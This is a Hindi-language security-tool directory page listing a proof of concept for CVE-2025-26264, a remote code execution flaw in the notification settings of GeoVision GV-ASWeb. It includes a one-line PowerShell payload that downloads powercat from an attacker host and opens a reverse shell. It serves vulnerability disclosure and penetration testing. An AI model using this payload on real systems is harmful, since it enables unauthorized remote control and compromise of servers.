Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-26264 — CVE-2025-26264 - GeoVision GV-ASWeb संस्करण 6.1.2.0 या उससे कम में, इसकी Notification Settings सुविधा के भीतर एक Remote Code Execution (RCE) भेद्यता मौजूद है। ASWeb में "System Settings" विशेषाधिकारों वाला एक प्रमाणित हमलावर इस दोष का फायदा उठाकर सर्वर पर मनमाने कमांड निष्पादित कर सकता है, जिससे सिस्टम से पूर्ण समझौता हो सकता है। | Kitploit
उपकरण/GitHubGitHub/hxlxmj/cve-2025-26264
भेद्यता विश्लेषणशोषणपार्श्व आंदोलनवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubhxlxmj/cve-2025-26264

CVE-2025-26264

रिपॉजिटरी देखें
151 साल पहलेअभी तक समीक्षित नहीं
वेबसाइट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

CVE-2025-26264 - GeoVision GV-ASWeb संस्करण 6.1.2.0 या उससे कम में, इसकी Notification Settings सुविधा के भीतर एक Remote Code Execution (RCE) भेद्यता मौजूद है। ASWeb में "System Settings" विशेषाधिकारों वाला एक प्रमाणित हमलावर इस दोष का फायदा उठाकर सर्वर पर मनमाने कमांड निष्पादित कर सकता है, जिससे सिस्टम से पूर्ण समझौता हो सकता है।

साझा करें

CVE-2025-26264

CVE-2025-26264 - GeoVision GV-ASWeb संस्करण 6.1.2.0 या उससे कम, अपनी Notification Settings सुविधा में Remote Code Execution (RCE) भेद्यता रखता है। ASWeb में "System Settings" विशेषाधिकार वाला एक प्रमाणित हमलावर इस दोष का फायदा उठाकर सर्वर पर मनमाने कमांड निष्पादित कर सकता है, जिससे सिस्टम से पूरी तरह समझौता हो सकता है।

आवश्यकताएँ

सफल हमला करने के लिए एक हमलावर को निम्न की आवश्यकता होती है:

  • संस्करण 6.1.2.0 या उससे कम वाले GV-ASManager वेब एप्लिकेशन तक नेटवर्क पहुंच;
  • Notification Settings सुविधा प्रबंधित करने के विशेषाधिकार वाले खाते तक पहुंच।

प्रभाव

इस भेद्यता का उपयोग करके निम्नलिखित अनधिकृत कार्य किए जा सकते हैं:

  • Notification Settings सुविधा प्रबंधित करने के विशेषाधिकार वाला खाता निम्न में सक्षम है:
    • Remote Code Execution हमला करना।
  • सफल हमले के बाद, हमलावर निम्न कार्य करने में सक्षम होगा:
    • संवेदनशील सिस्टम जानकारी को एक्सेस, संशोधित, या हटाना;
    • सिस्टम में बैकडोर स्थापित करना;
    • रैनसमवेयर हमला करना;
    • आंतरिक नेटवर्क में लेटरल मूवमेंट करना।

CVE-2025-26264 PoC [GeoVision v6.1.2.0 का परीक्षण]

GeoVision GV-ASManager के ASWeb प्लेटफॉर्म में Remote Code Execution भेद्यता का शोषण संस्करण 6.1.2.0 या उससे कम के विरुद्ध संभव है (26 फरवरी 2025 तक कोई फिक्स उपलब्ध नहीं है)।

GeoVision ASManager का ASWeb फ़ंक्शन Notification Setting RCE के प्रति संवेदनशील है

विशिष्ट घटना पर सूचना सेट करने का HTTP अनुरोध: TAWeb लॉगिन प्रयास विफल

इस स्क्रिप्ट के अनुसार, यदि TAWeb लॉगिन प्रयास विफल होता है, तो निम्न PowerShell स्क्रिप्ट निष्पादित की जाएगी:

powershell.exe Set-ExecutionPolicy Bypass -Force;IEX(New-Object System.Net.WebClient).DownloadString('http://LHOST/powercat.ps1');powercat -c LHOST -p LPORT -e powershell

TAWeb में प्रमाणीकरण का एक विफल प्रयास

पीड़ित का होस्ट: स्क्रिप्ट हमलावर के होस्ट के लिए एक बैकडोर खोलती है।

हमलावर का होस्ट: हमलावर को शेल प्राप्त होता है

संपर्क

यदि आपका कोई प्रश्न है, तो आप मुझसे LinkedIn पर संपर्क कर सकते हैं, Giorgi Dograshvili।

टूल डाउनलोड करें